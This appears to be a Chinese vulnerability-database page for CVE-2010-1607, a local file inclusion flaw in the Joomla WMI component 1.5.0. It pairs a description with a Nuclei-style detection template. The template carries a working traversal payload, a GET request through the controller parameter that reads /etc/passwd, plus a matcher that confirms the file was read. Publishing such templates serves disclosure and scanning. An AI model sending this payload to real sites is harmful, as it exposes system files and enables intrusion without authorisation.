CVE-2010-1607: Joomla! Component WMI 1.5.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla | POC: 已公开

漏洞描述

A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-1607

info:
  name: Joomla! Component WMI 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12316
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1607
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1607
    cwe-id: CWE-22
    epss-score: 0.02245
    epss-percentile: 0.83983
    cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: paysyspro
    product: com_wmi
  tags: cve,cve2010,joomla,lfi,edb,paysyspro

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bb0faf25fa8278284b4c1e8ee5e11258397f33f14df35825aabeab81adecf15d022100bcaaf536c657f7f48daa797d7a5834a3e69ad749dd7d7dc882b4fc60f0f1b4c7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐